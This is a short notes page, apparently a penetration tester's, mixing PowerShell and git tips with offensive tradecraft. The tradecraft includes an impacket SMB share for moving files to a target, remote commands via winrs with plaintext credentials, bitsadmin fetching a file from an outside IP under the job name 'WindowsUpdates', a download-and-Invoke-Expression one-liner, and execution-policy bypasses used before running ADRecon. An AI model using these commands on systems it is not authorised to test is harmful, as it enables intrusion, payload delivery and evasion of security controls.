# Notes

{% hint style="info" %}
Impacket has a module that opens a share in a smb server for file transfer:

on Kali > impacket-smbserver -smb2support \<share name> \<directory>

on Target > net uset z: \\\\\<kali ip>\\\<share name>

then just cd to z:
{% endhint %}

{% hint style="info" %}
git reset --hard = update the repository
{% endhint %}

{% hint style="info" %}
pwsh = to open powershell on Linux
{% endhint %}

{% hint style="info" %}
change powershell window's title:

$host.UI.RawUI.WindowTitle = “WINDOWS NAME”
{% endhint %}

{% hint style="info" %}

#### Change colors between quotes

set-psreadlineoption -colors @{ string = 'green' }
{% endhint %}

{% hint style="info" %}

#### WinFetch to display info system

(Invoke-WebRequest "<https://raw.githubusercontent.com/lptstr/winfetch/master/winfetch.ps1>" -UseBasicParsing).Content.Remove(0,1) | Invoke-Expression
{% endhint %}

```powershell
# Copy file to the machine

echo F | xcopy C:\Users\myuser\file.exe \\teste-machine\c$\Users\Public\file.exe /Y

winrs -r:<machine> -u:<user> -p:<pass> "bitsadmin /transfer WindowsUpdates /priority normal http://<ip>/<file> C:\\Users\\Public\\<file>"
```

#### Turn off Execution Policy:&#x20;

```powershell
PS > $ExecPolicy = Get-ExecutionPolicy 
PS > Set-ExecutionPolicy bypass PS > .\ADRecon.ps1 
PS > Set-ExecutionPolicy $ExecPolicy
```

```powershell
powershell.exe -ep bypass
```

```powershell
PS > $Env:PSExecutionPolicyPreference = 'Bypass'
```